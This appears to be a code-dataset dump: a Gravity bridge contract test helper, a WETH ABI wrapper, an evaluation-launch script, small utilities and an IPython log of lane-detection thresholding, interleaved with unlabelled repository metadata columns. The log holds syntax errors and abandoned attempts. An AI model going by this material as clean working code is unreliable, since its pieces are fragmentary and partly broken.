"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1d",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1e",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf1f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf20",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf21",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf22",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf23",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf24",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf25",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf26",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf27",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf28",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf29",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2c",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2d",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2e",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf2f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf30",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf31",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf32",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf33",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf34",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf35",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf36",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf37",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf38",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf39",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3c",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3d",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3e",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf3f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf40",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf41",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf42",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf43",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf44",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf45",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf46",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf47",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf48",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf49",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4c",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4d",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4e",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf4f",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf50",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf51",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf52",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf53",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf54",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf55",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf56",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf57",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf58",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf59",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf5a",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf5b",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf5c",
"0x2c7dd57db9fda0ea1a1428dcaa4bec1ff7c3bd7d1a88504754e0134b77badf5d",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb100",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb101",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb102",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb103",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb104",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb105",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb106",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb107",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb108",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb109",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10a",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10b",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10c",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10d",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10e",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb10f",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb110",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb111",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb112",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb113",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb114",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb115",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb116",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb117",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb118",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb119",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11a",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11b",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11c",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11d",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11e",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb11f",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb120",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb121",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb122",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb123",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb124",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb125",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb126",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb127",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb128",
"0x47aa5fbb74b21f263888dfc24a7a7b184634142935d4e2152b1c901516eeb129",
"0xb1bab011e03a9862664706fc3bbaa1b16651528e5f0e7fbfcbfdd8be302a13e7"
]
def getSignerAddresses(signers):
ret = []
for i in range(len(signers)):
ret.append(signers[i].address)
return ret
def makeCheckpoint(validators, powers, valsetNonce, gravityId, rewardAmount=0, rewardToken="0x0000000000000000000000000000000000000000"):
methodName = b"checkpoint"
abiEncoded = encode_abi(["bytes32", "bytes32", "uint256", "address[]", "uint256[]", "uint256", "address"], [gravityId, methodName, valsetNonce, validators, powers, rewardAmount, rewardToken])
checkpoint = web3.keccak(abiEncoded)
return checkpoint
def examplePowers():
return [
707,
621,
608,
439,
412,
407,
319,
312,
311,
303,
246,
241,
224,
213,
194,
175,
173,
170,
154,
149,
139,
123,
119,
113,
110,
107,
105,
104,
92,
90,
88,
88,
88,
85,
85,
84,
82,
70,
67,
64,
59,
58,
56,
55,
52,
52,
52,
50,
49,
44,
42,
40,
39,
38,
37,
37,
36,
35,
34,
33,
33,
33,
32,
31,
30,
30,
29,
28,
27,
26,
25,
24,
23,
23,
22,
22,
22,
21,
21,
20,
19,
18,
17,
16,
14,
14,
13,
13,
11,
10,
10,
10,
10,
10,
9,
8,
8,
7,
7,
7,
6,
6,
5,
5,
5,
5,
5,
5,
4,
4,
3,
2,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1,
1
]
def deployContracts(signers, gravityId, validators, powers, powerThreshold):
testERC20 = TestERC20A.deploy({"from": signers[0]})
valAddresses = getSignerAddresses(validators)
checkpoint = makeCheckpoint(valAddresses, powers, 0, gravityId)
gravity = Gravity.deploy(gravityId, powerThreshold, valAddresses, powers, {"from": signers[0]})
return gravity, testERC20, checkpoint
def signHash(signers, hash):
sign = []
for i in range(len(signers)):
signed_message = web3.eth.account.sign_message(encode_defunct(hash), signers[i].private_key)
sign.append([signed_message.v, signed_message.r, signed_message.s])
return sign
def bstring2bytes32(str):
return encode_abi(["bytes32"], [str])
| 45.771014
| 195
| 0.765373
| 508
| 15,791
| 23.748032
| 0.629921
| 0.001989
| 0.002735
| 0.003316
| 0.005056
| 0.004559
| 0.001078
| 0.001078
| 0.001078
| 0.001078
| 0
| 0.476117
| 0.182002
| 15,791
| 344
| 196
| 45.90407
| 0.457846
| 0.001077
| 0
| 0.189024
| 0
| 0
| 0.664997
| 0.659608
| 0
| 1
| 0.659608
| 0
| 0
| 1
| 0.02439
| false
| 0
| 0.015244
| 0.009146
| 0.067073
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f5f612bf2d0515fd9d3d46cf24ad8cf3e14dd227
| 2,860
|
py
|
Python
|
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
shadowlands/erc20/weth.py
|
carver/shadowlands-core
|
8931254da4af7e4cde3594fe1bcbf92a34ac02a4
|
[
"MIT"
] | null | null | null |
from shadowlands.contract.erc20 import Erc20
class Weth(Erc20):
KOVAN='0xd0A1E359811322d97991E03f863a0C30C2cF029C'
ABI='[{"constant":true,"inputs":[],"name":"name","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"guy","type":"address"},{"name":"wad","type":"uint256"}],"name":"approve","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"totalSupply","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"src","type":"address"},{"name":"dst","type":"address"},{"name":"wad","type":"uint256"}],"name":"transferFrom","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[{"name":"wad","type":"uint256"}],"name":"withdraw","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"decimals","outputs":[{"name":"","type":"uint8"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"balanceOf","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"symbol","outputs":[{"name":"","type":"string"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"dst","type":"address"},{"name":"wad","type":"uint256"}],"name":"transfer","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"constant":true,"inputs":[{"name":"","type":"address"},{"name":"","type":"address"}],"name":"allowance","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":true,"name":"guy","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":true,"name":"dst","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"dst","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Deposit","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"name":"src","type":"address"},{"indexed":false,"name":"wad","type":"uint256"}],"name":"Withdrawal","type":"event"}]'
| 238.333333
| 2,733
| 0.63986
| 306
| 2,860
| 5.980392
| 0.153595
| 0.078142
| 0.147541
| 0.078689
| 0.826776
| 0.778689
| 0.769945
| 0.751913
| 0.736066
| 0.620219
| 0
| 0.024321
| 0.008042
| 2,860
| 11
| 2,734
| 260
| 0.620726
| 0
| 0
| 0
| 0
| 0.25
| 0.968816
| 0.968816
| 0
| 0
| 0.014716
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
eb0693aaf5317fbddb472404d4ffb0b7714e5185
| 515
|
py
|
Python
|
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
eval_mosmed_timm-regnetx_002_Posterize.py
|
BrunoKrinski/segtool
|
cb604b5f38104c43a76450136e37c3d1c4b6d275
|
[
"MIT"
] | null | null | null |
import os
ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_Posterize.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_Posterize.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_Posterize.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_Posterize.yml",
"python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_Posterize.yml",
]
for l in ls:
os.system(l)
| 46.818182
| 97
| 0.838835
| 80
| 515
| 5.025
| 0.3
| 0.124378
| 0.149254
| 0.236318
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0.890547
| 0
| 0.041322
| 0.060194
| 515
| 11
| 98
| 46.818182
| 0.789256
| 0
| 0
| 0
| 0
| 0
| 0.872093
| 0.629845
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eb2470f98dea2c7450f17b511992696f37ee0ead
| 173
|
py
|
Python
|
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
opsep/__init__.py
|
opsep/opsep-python
|
561f7e0bd3f3149ec1ed56bd049f572d6dffbfdd
|
[
"Apache-2.0"
] | null | null | null |
from .main import opsep_hybrid_decrypt, opsep_hybrid_encrypt, opsep_hybrid_encrypt_with_auditlog
from .opsep import RateLimitError, BadRequestError, OPSEP_URL, fetch_pubkey
| 57.666667
| 96
| 0.884393
| 23
| 173
| 6.217391
| 0.608696
| 0.230769
| 0.251748
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075145
| 173
| 2
| 97
| 86.5
| 0.89375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dec168735523f8619b5d20959855f1d0f930ae53
| 46
|
py
|
Python
|
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | 1
|
2020-04-16T08:37:19.000Z
|
2020-04-16T08:37:19.000Z
|
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | null | null | null |
utils/system.py
|
chung1905/skynet-chatbot
|
932a45f81f1bb78a49d1c968d325319fd3c4cc73
|
[
"MIT"
] | 1
|
2020-04-16T08:37:24.000Z
|
2020-04-16T08:37:24.000Z
|
def get_system() -> str:
return 'linux64'
| 15.333333
| 24
| 0.630435
| 6
| 46
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.217391
| 46
| 2
| 25
| 23
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9d42ac88a9382bf370502135970209926a3835fe
| 22,989
|
py
|
Python
|
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
ipython_logs/log_02-06-19_14-04-00.py
|
CaffeineHighZombie/Autonomous-Car-ND-Advanced-Lane-Lines
|
7c85e94bfae7cf6ac6c18f390dd00c3e896c60b0
|
[
"MIT"
] | null | null | null |
# IPython log file
get_ipython().run_line_magic('logstart', '')
from main import *
pipeline
image_cal = CalibrateCamera()
get_ipython().run_line_magic('load_ext', 'autoreload')
get_ipython().run_line_magic('autoreload', '2')
from main import *
check
from main import *
check
check
check
from main import *
check
image_cal = CalibrateCamera()
image_cal.calculate_imgpoints_over_directory()
image_cal.calculate_calibration_parameters()
img = mpimg.imread("./test_images/straight_lines2.jpg")
plt.imshow(img)
plt.show()
ksize = 5
from main import *
from main import *
ksize = 5
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
plot_image_side_by_side(img, gray)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3)))
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
gradx = abs_sobel_thresh(img, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(img, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(img, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
dir_binary = dir_threshold(img, sobel_kernel=ksize, thresh=(0.7, 1.3))
plot_image_side_by_side(img, gradx)
plot_image_side_by_side(img, grady)
plot_image_side_by_side(img, mag_binary)
plot_image_side_by_side(img, dir_binary)
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(img, combined)
plot_image_side_by_side(img, dir_binary)
plot_image_side_by_side(img, mag_binary)
plot_image_side_by_side(img, grady)
plot_image_side_by_side(img, gradx)
plot_image_side_by_side(img, combined)
color_binary = pipeline(img)
plt.imshow(color_binary)
plt.show()
gray = cv2.cvtColor(color_binary, cv2.RGB2GRAY)
gray = cv2.cvtColor(color_binary, cv2.COLOR_RGB2GRAY)
plt.imshow(gray)
plt.show()
plt.imshow(gray, cmap="gray"))
plt.imshow(gray, cmap="gray")
plt.show()
def sobel_test(img, ksize=5):
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(img, combined)
image_list = glob.glob("./test_images/*.jpg")
image_list
for image in image_list:
sobel_test(image)
for image in image_list:
image_read = mpimg.imread(image)
sobel_test(image_read)
for image in image_list:
image_read = mpimg.imread(image)
plt.imshow(image_read)
plt.show()
sobel_test(image_read)
image_list[0]
image = mpimg.imread(image_list[0])
gradx = abs_sobel_thresh(image, orient="x", sobel_kernel=ksize, thresh=(20. 100))
gradx = abs_sobel_thresh(image, orient="x", sobel_kernel=ksize, thresh=(20, 100))
sobel_test(image)
for image in image_list:
image_read = mpimg.imread(image)
sobel_test(image_read)
sobel_test(mpimg.imread(image_list[5]))
image_list[0]
img_l = image_list[5]
img_l
img_l_read = mpimg.imread(img_l)
sobel_tes(img_l)
sobel_test(img_l)
sobel_test(img_l_read)
def sobel_test(image, ksize=5):
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(image, combined)
for image in image_list:
image_read = mpimg.imread(image)
sobel_test(image_read)
def hsv_test(image):
color_binary = pipeline(image)
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(24, 9))
f.tight_layout()
ax1.imshow(image)
ax1.set_title('Original Image', fontsize=50)
ax2.imshow(color_binary)
ax2.set_title('Combined Image', fontsize=50)
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
for image in image_list:
image_read = mpimg.imread(image)
hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(image, combined)
for image in image_list:
image_read = mpimg.imread(image)
soble_plus_hsv_test(image_read)
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
plot_image_side_by_side(inp_img, combined)
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
image = pipeline(inp_img)
gradx = abs_sobel_thresh(image, orient='x', sobel_kernel=ksize, thresh=(20, 100))
grady = abs_sobel_thresh(image, orient='y', sobel_kernel=ksize, thresh=(20, 100))
mag_binary = mag_thresh(image, sobel_kernel=ksize, mag_thresh=(30, 100))
dir_binary = dir_threshold(image, sobel_kernel=ksize, thresh=(0.7, 1.3))
combined = np.zeros_like(dir_binary)
combined[((gradx == 1) & (grady == 1)) | ((mag_binary == 1) & (dir_binary == 1))] = 1
f, (ax1, ax2, ax3) = plt.subplots(1, 3, figsize=(24, 9))
f.tight_layout()
ax1.imshow(inp_img)
ax2.imshow(image)
ax3.imshow(combined, cmap="gray")
plt.subplots_adjust(left=0., right=1, top=0.9, bottom=0.)
plt.show()
for image in image_list:
image_read = mpimg.imread(image)
sobel_plus_hsv_test(image_read)
def sobel_plus_hsv_test(inp_img, ksize=5):
